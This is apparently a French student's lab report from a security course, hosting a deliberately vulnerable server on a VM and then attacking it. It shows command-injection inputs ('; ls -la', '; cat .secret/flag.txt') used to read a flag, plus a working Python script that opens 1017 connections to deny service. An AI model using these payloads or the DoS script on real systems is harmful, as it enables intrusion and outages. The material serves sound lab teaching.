# I. Partie 1 : Host & Hack
Quand on doit héberger une nouvelle application, la première étape, c'est de regarder un peu ce qu'elle fait.  
On saura alors quoi faire pour l'héberger au mieux.
Comme j'ai sous-entendu en intro, il se peut que l'application soit *légèrement* vulnérable... Vous vous chargerez dans un **second** temps de trouver la vulnérabilité, et l'exploiter.  
**D'abord, on lance le machin, on voit ce que ça fait.**
## Sommaire
- [I. Partie 1 : Host \& Hack](#i-partie-1--host--hack)
  - [Sommaire](#sommaire)
  - [1. A vos marques](#1-a-vos-marques)
  - [2. Prêts](#2-prêts)
  - [3. Hackez](#3-hackez)
## 1. A vos marques
🌞 **Télécharger l'application depuis votre VM**
- une commande `wget` ou `curl` fait le taff
- c'est dispo sur ce dépôt git, c'est le fichier `efrei_server`
```bash
[meow@efrei-xmg4agau1 ~]$ wget https://gitlab.com/it4lik/b3-csec-2024/-/raw/main/efrei_server
--2024-09-10 09:45:57--  https://gitlab.com/it4lik/b3-csec-2024/-/raw/main/efrei_server
Resolving gitlab.com (gitlab.com)... 172.65.251.78, 2606:4700:90:0:f22e:fbec:5bed:a9b9
Connecting to gitlab.com (gitlab.com)|172.65.251.78|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7213419 (6.9M) [application/octet-stream]
Saving to: ‘efrei_server’

efrei_server                            100%[==============================================================================>]   6.88M  1.36MB/s    in 6.4s

2024-09-10 09:46:04 (1.08 MB/s) - ‘efrei_server’ saved [7213419/7213419]
```
🌞 **Lancer l'application `efrei_server`**
- sur la VM hein :)
- lancer l'application à la main
- l'application va écouter sur l'IP `127.0.0.1` par défaut, il faudra la lancer avec une variable d'environnement définie pour changer ça
> *Appelez-moi vite s'il ne se lance pas, c'est censé être un truc très simple qui juste fonctionne.*
➜ **Pour lancer une commande en définissant une variable d'environnement à la volée**, on peut faire comme ça :
```bash
SUPER_VAR=toto command
# par exemple, même si ça sert à rien
SUPER_VAR=toto ls /tmp
```

```bash
[meow@efrei-xmg4agau1 ~]$ file efrei_server
efrei_server: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=f03d903a6268032095b0f6f60b19b3f1d9df99c3, for GNU/Linux 3.2.0, stripped
[meow@efrei-xmg4agau1 ~]$ chmod +x efrei_server
[meow@efrei-xmg4agau1 ~]$ ./efrei_server
Warning: You should consider setting the environment variable LISTEN_ADDRESS. Defaults to 127.0.0.1.
Warning: You should consider setting the environment variable LOG_DIR. Defaults to /tmp.
Server started. Listening on ('127.0.0.1', 8888)...
```
🌞 **Prouvez que l'application écoute sur l'IP que vous avez spécifiée**
- profitez-en pour repérer le port TCP sur lequel écoute l'application
- ça se fait en une seule commande `ss`
- filtrez la sortie de la commande avec un `| grep` pour mettre en évidence la ligne intéressante dans le compte-rendu
```bash
[meow@efrei-xmg4agau1 ~]$ export LISTEN_ADDRESS=192.168.86.4
[meow@efrei-xmg4agau1 ~]$ ./efrei_server
Warning: You should consider setting the environment variable LOG_DIR. Defaults to /tmp.
Server started. Listening on ('192.168.86.4', 8888)...

[meow@efrei-xmg4agau1 ~]$ ss -at '( dport = :8888 or sport = :8888 )'
State             Recv-Q            Send-Q                       Local Address:Port                            Peer Address:Port            Process
LISTEN            0                 100                           192.168.86.4:ddi-tcp-1                            0.0.0.0:*

[meow@efrei-xmg4agau1 ~]$ ss -tuln | grep 8888
tcp   LISTEN 0      100     192.168.86.4:8888      0.0.0.0:*
```
## 2. Prêts
🌞 **Se connecter à l'application depuis votre PC**
- depuis votre PC ! (pas depuis une VM)
- depuis votre PC, utilisez une commande `nc` (netcat) pour vous connecter à l'application
  - il faudra l'installer si vous ne l'avez pas sur votre PC :)
- il faudra ouvrir un port firewall sur la VM (celui sur lequel écoute `efrei_server`, que vous avez repéré à l'étape précédente) pour qu'un client puisse se connecter
```bash
# avec netcat, vous pourrez vous connecter en saissant :
nc <IP> <PORT>
```

```
firewall-cmd --add-port=8888/tcp --permanent
success
firewall-cmd --reload
success

PS C:\Users\1dk1d> ncat.exe 192.168.86.4 8888
Hello ! Tu veux des infos sur quoi ?
1) cpu
2) ram
3) disk
4) ls un dossier

Ton choix (1, 2, 3 ou 4) : 1

Load average
  Last 1 min : 0.04
  Last 5 min : 0.01
  Last 15 min : 0.0
  ```
## 3. Hackez
🌞 **Euh bah... hackez l'application !**
- elle est vulnérable
- c'est un cas d'école, je pense que ça prendra pas longtemps à la plupart d'entre vous :d
- bref, en tant que clients, vous pouvez avoir un shell sur la machine serveur, et exécuter des commandes
```bash
nc 192.168.86.4 8888
Hello ! Tu veux des infos sur quoi ?
1) cpu
2) ram
3) disk
4) ls un dossier

Ton choix (1, 2, 3 ou 4) : 4
Exécuter la commande ls vers le dossier : ; ls -la

efrei_server
work
total 7068
drwx------. 4 meow meow     148 Sep 10 11:05 .
drwxr-xr-x. 3 root root      18 Sep 10 09:40 ..
-rw-------. 1 meow meow      17 Sep 10 09:42 .bash_history
-rw-r--r--. 1 meow meow      18 Jan 23  2023 .bash_logout
-rw-r--r--. 1 meow meow     141 Jan 23  2023 .bash_profile
-rw-r--r--. 1 meow meow     492 Jan 23  2023 .bashrc
-rwxr-xr-x. 1 meow meow 7213419 Sep 10 09:46 efrei_server
drwxr-xr-x. 2 meow meow      22 Sep 10 11:06 .secret
-rw-r--r--. 1 meow meow     165 Sep 10 09:46 .wget-hsts
drwxr-xr-x. 2 meow meow       6 Sep 10 09:45 work

Hello ! Tu veux des infos sur quoi ?
1) cpu
2) ram
3) disk
4) ls un dossier

Ton choix (1, 2, 3 ou 4) : 4
Exécuter la commande ls vers le dossier : ; cat .secret/flag.txt

efrei_server
work
cc c le flag
```
> N'hésitez pas à me demander de l'aide pour cette section si c'est po clair ni intuitif pour vous.
🌟 **BONUS : DOS l'application**
- il faut rendre l'application inopérante
- pour être précis, un DOS ici, c'est qu'aucun autre client ne doit pouvoir se connecter
- utilisez un autre vecteur que la vulnérabilité précédente pour provoquer le DOS
```py
# (C'est du chatgpt hein)
import asyncio

target_ip = '192.168.86.4'
target_port = 8888

num_connections = 1017 # faut être précis

async def establish_connection(i):
    try:
        reader, writer = await asyncio.open_connection(target_ip, target_port)
        print(f"Connexion {i + 1} établie.")

        await asyncio.sleep(3600)

        writer.close()
        await writer.wait_closed()
    except Exception as e:
        print(f"Erreur lors de la connexion {i + 1}: {e}")

async def main():
    tasks = []

    for i in range(num_connections):
        tasks.append(establish_connection(i))

    await asyncio.gather(*tasks)

asyncio.run(main())
```
```bash
...
Connexion 1011 établie.
Connexion 1012 établie.
Connexion 1013 établie.
Connexion 1014 établie.
Connexion 1015 établie.
Connexion 1016 établie.
Connexion 1017 établie.

PS C:\Users\1dk1d> ncat.exe 192.168.86.4 8888
(Pas de réponse, ça crash)
```

---
➜ **BON** on a une application qui tourne sur une machine Linux, à l'arrache.  
**Nos dévs sont nuls, l'app est vulnérable.** 🙃
> *ui c moa le dév é alor ?!*
Dans le reste du TP, **on va continuer à bosser sur l'hébergement mais en sachant ça : l'app est vulnérable.**  
Notre but va donc être de proposer l'hébergement de cette application vulnérable, mais en **minimisant l'impact de cette vulnérabilité** le plus possible.
➜ **Comment héberger une application vulnérable et dormir (à peu près) sur ses deux oreilles ?**
> *Bonne question Jamy ! Continuons le TP :d*